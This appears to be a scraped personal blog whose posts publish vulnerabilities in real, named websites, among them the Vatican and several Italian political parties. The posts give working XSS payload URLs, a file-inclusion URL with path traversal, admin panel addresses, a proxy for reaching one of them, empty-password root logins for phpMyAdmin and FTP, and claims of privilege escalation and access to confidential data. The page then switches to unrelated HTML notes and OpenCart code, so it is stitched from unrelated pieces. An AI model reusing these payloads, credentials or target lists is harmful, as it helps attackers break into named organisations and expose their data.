pro(re)gress

by simply using the theme url http://www.hacksannio.it/wp-content/themes/betheme/ we can raise an error Fatal error : Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in  /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php  on line  10 _______________ Update: after getting the possibility to execute code it's possible to locally escalate root privileges (expl. openrestinpeace) and local DoS. There are several other websites on the server: 9plus.it abgdhs.com academyhoreca.it acquagia.com agropolibooking.it albertogalantini.com alcacomunicazione.it alexandramatveeva.com alkemicaproject.it allianceagainstcancer.org anelli.info angolodeidesideri.it antonelladambrosio.com apicolturavallicupe.com appcreative.it arredostil.it aspveneto.org avvocatovitali.com bbqcombi.com belsiana7central.com beneventocalcio.it bestrav

Simple XSS http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E _____________________________________ Adobe experience manager CMS A proxy is needed to connect since probably they limited the access from a range of IPs -> Sample working proxy: 5.152.158.4:8080 Admin access:  https://w2.vatican.va:4502/admin SSL verification must be disabled (OCSP on firefox). Update: it's possible to access _____________________________________ Other websites http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true _____________________________________  http://www.photovat.com IIS server D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi File Inclusion dodosmail.php is a bogus contact email script. http://www.movimento5stelle.it/parlamento/segnalazioni.html http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file] example : http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html archived page that shows the inclusion of an html page available on the server: http://archive.is/vHgOn archived source of the movable type cgi (A bogus obsolete version used on the website): http://archive.is/20Uen http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi the script can be triggered to show errors and the path Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58     XSS There are various xss and stored xss in the profil

https://iscriviti.radicali.it directly accessing this url we get an error with the paths https://iscriviti.radicali.it/Landing/RegistraDati D:\xampp\htdocs\radicali\landing_iscrizione\index.php They are using windows and xampp that are not the best solution for a production server that should store sensitive data. The php scripts are using the codeigniter framework. The archived error page: http://archive.is/PFw55 Access to phpmyadmin https://iscriviti.radicali.it/phpmyadmin/ user: root password: "" ftp:iscriviti.radicali.it user: root password: "" update: it's not working anymore.

Vulnerable Phocadownload Possibility to add different videos from youtube www.leganord.org/index.php/documenti-politici/68-gianfranco-miglio/8741-quella-rivoluzione-dal-basso?videoid=[youtube video id] They also got a malware (not from me - a lot of porn stuff) Google Cache http://webcache.googleusercontent.com/search?q=cache:r0-Y-VR0oHAJ:www.leganord.org/xIpV58pu_+&cd=11&hl=it&ct=clnk&gl=it Copy of the cached page: http://archive.is/7Vhy9 Note: they fixed the problems.

There is a path disclosure thanks to an error. https://margot.partitodemocratico.it/nl/cancellami.php?e=test&secure=test unsubscribe_v2.php https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=[anything]&question=[anything]&answer=[anything]&e=[anything]&secure=[anything]&mid=[anything] (original sample - https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=2&question=2&answer=si&e=ZWxpb3BvbGlAdGlzY2FsaS5pdA&secure=04912b36dcc08f33892266834a963bf0&mid=1eea ) It's possible to have access to the system. Is it an "honeypot" ... as stated in the path? It's possible but they didn't fix the bugs and it's possible to access to confidential data. /repository/GCloud-WebRoot/margot.partitodemocratico.it/pd_margot_honeypot/

04/09/2017 http://www.pdcampania.it wordpress 4.2.8 It's possible to inject content and reset the admin password and get the email to an external MX server. The website is down for restyling but the wordpress scripts are still available to the public. For example the admin area: www.pdcampania.it/wp-admin

Content Models Metadata : Content that sets up the presentation or behavior of the rest of the content. These elements are found in the  head  of the document. Elements:   <base> ,  <link> ,  <meta> ,  <noscript> ,  <script> ,  <style> ,  <title> Embedded : Content that imports other resources into the document. Elements:   <audio> ,  <video> ,  <canvas> ,  <iframe> ,  <img> , <math>,  <object> ,  <svg> Interactive : Content specifically intended for user interaction. Elements:   <a> ,  <audio> ,  <video> ,  <button> , <details>,  <embed> ,  <iframe> ,  <img> ,  <input> ,  <label> ,  <object> ,  <select> ,  <textarea> Heading : Defines a section header. Elements:   <h1> ,  <h2> ,  <h3> ,  <h4> ,  <h5> ,  <h6> , <hgroup> Phrasing : This model has a number of inline level element

//loading the settings $this->load->model('setting/setting'); $setting = $this->model_setting_setting->getSetting('mymodule'); //saving the settings $this->load->model('setting/setting'); $setting = $this->model_setting_setting->editSetting('mymodule'); NOTE: in the form the input name="" must start with the name of the module. Example: mymodule_limit, mymodule_status, mymodule_othersetting //getting data from the module - usually is loaded by the configured layout         $this->load->model('extension/module'); $setting = $this->model_extension_module->getModuleByCode('mymodule'); //saving data for the module with new id from the POST (saves a new one that can be loaded from the layout)         $this->load->model('extension/module');                if (!isset($this->request->get['module_id'])) { // $this->model_extension_m